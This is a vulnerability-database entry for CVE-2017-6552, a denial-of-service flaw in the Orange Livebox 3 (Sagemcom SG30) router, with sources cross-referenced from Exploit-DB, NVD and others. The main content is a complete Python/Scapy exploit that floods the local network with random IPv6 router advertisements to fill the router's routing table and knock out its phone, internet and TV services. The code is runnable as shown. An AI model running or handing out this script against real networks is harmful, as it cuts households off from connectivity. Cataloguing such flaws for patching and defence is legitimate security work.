ID
VAR-E-201703-0156
CVE
| cve_id: | CVE-2017-6552 | Trust: 1.8 |
EDB ID
41565
TITLE
Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service. CVE-2017-6552 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | livebox | model: | sagemcom sg30 sip-fr-5.15.8.1 | scope: | eq | version: | 3 | Trust: 2.1 |
| vendor: | orange | model: | livebox sagemcom sg30 sip-fr-5.15.8.1 | scope: | eq | version: | 3 | Trust: 0.3 |
EXPLOIT
#!/usr/bin/python
# Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3
# Date: 09/03/2017
# Exploit Author: Quentin Olagne
# Vendor Homepage: http://www.orange.fr/
# Version: SG30_sip-fr-5.15.8.1
# Tested on: Livebox 3 - Sagemcom
# CVE : CVE-2017-6552
'''
Livebox router has its default IPv6 routing table max. size too
small and therefore can be filled within minutes.
An attacker can exploit this issue to render the affected system
unresponsive, resulting in a denial-of-service condition for Phone,
Internet and TV services.
Vulenrability has been discovered in April '16 and has been patched some time ago with the newest firmware.
I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin
livebox web UI, don't know if it's been implemented.
'''
from scapy.all import *
import time
import threading
start_time = time.time()
def printit():
threading.Timer(5.0, printit).start()
interval = time.time() - start_time
print 'Total time in seconds:', interval, '\n'
printit()
packet = Ether() \
/IPv6() \
/ICMPv6ND_RA() \
/ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \
/ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42"))
try:
sendp(packet,loop=1)
except KeyboardInterrupt:
stored_exception=sys.exc_info()
except:
pass
print "Goodbye"
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | denial of service | Trust: 0.5 |
| tag: | overflow | Trust: 0.5 |
CREDITS
Quentin Olagne
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2017-6552 | Trust: 1.8 |
| db: | EXPLOIT-DB | id: | 41565 | Trust: 1.6 |
| db: | EDBNET | id: | 91776 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 141525 | Trust: 0.5 |
| db: | BID | id: | 96827 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6552 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/41565/ | Trust: 0.6 |
| url: | http://www.orange.fr/portail | Trust: 0.3 |
SOURCES
| db: | BID | id: | 96827 |
| db: | PACKETSTORM | id: | 141525 |
| db: | EXPLOIT-DB | id: | 41565 |
| db: | EDBNET | id: | 91776 |
LAST UPDATE DATE
2022-07-27T10:00:42.338000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 96827 | date: | 2017-03-16T00:02:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 96827 | date: | 2017-03-09T00:00:00 |
| db: | PACKETSTORM | id: | 141525 | date: | 2017-03-09T16:40:43 |
| db: | EXPLOIT-DB | id: | 41565 | date: | 2017-03-09T00:00:00 |
| db: | EDBNET | id: | 91776 | date: | 2017-03-09T00:00:00 |